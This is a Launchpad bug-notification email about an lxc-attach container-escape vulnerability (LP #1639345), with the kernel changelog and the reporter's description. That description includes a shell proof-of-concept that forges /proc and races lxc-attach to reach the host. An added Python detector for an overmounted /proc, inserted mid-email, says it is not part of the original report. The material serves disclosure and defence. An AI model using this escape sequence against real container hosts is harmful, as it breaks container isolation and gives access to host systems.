This bug was fixed in the package linux - 3.19.0-75.83

---------------
linux (3.19.0-75.83) vivid; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640613

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
      uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
      checks

  * CVE-2016-8658
    - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
    - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

 -- Luis Henriques <luis.henriq...@canonical.com>  Wed, 09 Nov 2016
22:48:56 +0000

** Changed in: linux (Ubuntu Vivid)
       Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information
  to disable dropping of capabilities and may in the end access the host
  file system by winning a very easy race against lxc-attach.

  In guest sequence:

  cat <<EOF > /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  The exploit uses a fixed fd=7 for attacking; in other test environments, it
  might be a different fd. Tests were performed by attacking lxc-attach
  started by

  screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also
  not fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent ptracing of lxc-attach as it was created in another USERNS

  
  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages
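A host-side check that follows from the description above, where the container's /proc is covered by a bind mount of an attacker-controlled directory so that a tool reading "proc" files gets forged data. This is an added example, not code from the bug report or from the lxc project. It parses `/proc/<pid>/mountinfo` lines in the format documented in proc(5), which the host reads from its own procfs rather than from anything inside the container, and reports when the topmost mount at `/proc` is not of filesystem type `proc` (or when `/proc` is absent, as after the lazy umount in the sequence above). The mountinfo lines below are constructed samples; the function names are mine, not lxc's.

```python
"""Detect a container /proc that has been replaced by a bind mount.

Added example (not from the bug report or lxc). Parses /proc/<pid>/mountinfo
text and flags a /proc mount point whose filesystem type is not 'proc'.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass
class MountEntry:
    mount_id: int
    parent_id: int
    root: str          # path within the source filesystem (a bind mount shows its sub-path)
    mount_point: str   # where it is mounted in the process's mount namespace
    options: str
    fstype: str
    source: str


def _unescape(field: str) -> str:
    # mountinfo encodes space, tab, newline and backslash as octal escapes (\040 etc.)
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text: str) -> List[MountEntry]:
    """Parse mountinfo lines: 'id parent maj:min root mountpoint opts [optional...] - fstype source superopts'."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, sep, right = line.partition(" - ")
        if not sep:
            raise ValueError(f"malformed mountinfo line: {line!r}")
        lf = left.split()
        rf = right.split()
        if len(lf) < 6 or len(rf) < 2:
            raise ValueError(f"malformed mountinfo line: {line!r}")
        entries.append(MountEntry(
            mount_id=int(lf[0]),
            parent_id=int(lf[1]),
            root=_unescape(lf[3]),
            mount_point=_unescape(lf[4]),
            options=lf[5],
            fstype=rf[0],
            source=_unescape(rf[1]),
        ))
    return entries


def check_proc(mountinfo_text: str) -> str:
    """Return 'ok', 'missing', or 'overmounted:<fstype>:<root>' for the /proc mount point.

    Later lines in mountinfo stack on top of earlier ones at the same mount point,
    so the last entry at /proc is the one a process actually sees.
    """
    at_proc = [e for e in parse_mountinfo(mountinfo_text) if e.mount_point == "/proc"]
    if not at_proc:
        return "missing"
    top = at_proc[-1]
    if top.fstype != "proc":
        return f"overmounted:{top.fstype}:{top.root}"
    return "ok"


# Constructed sample data (not captured from a real system).
CLEAN_MOUNTINFO = """\
25 0 0:22 / / rw,relatime - ext4 /dev/sda1 rw
30 25 0:4 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
"""

# Same container after 'mount -o bind /test /proc': the bind mount shows the
# underlying filesystem type and its root sub-path instead of 'proc'.
OVERMOUNTED_MOUNTINFO = CLEAN_MOUNTINFO + """\
41 25 0:22 /test /proc rw,relatime - ext4 /dev/sda1 rw
"""

# After the lazy umount of /proc there is no /proc mount point at all.
NO_PROC_MOUNTINFO = """\
25 0 0:22 / / rw,relatime - ext4 /dev/sda1 rw
"""


if __name__ == "__main__":
    for name, text in [("clean", CLEAN_MOUNTINFO),
                       ("overmounted", OVERMOUNTED_MOUNTINFO),
                       ("no-proc", NO_PROC_MOUNTINFO)]:
        print(f"{name}: {check_proc(text)}")
```

On a live host the text passed to `check_proc` would be read from `/proc/<container-init-pid>/mountinfo` through the host's own procfs, so the verdict never depends on files the container's root user can forge; the same idea is the general fix the reporter asks for, namely that a host-side tool must not base privilege decisions on a proc view served by the container.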

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp
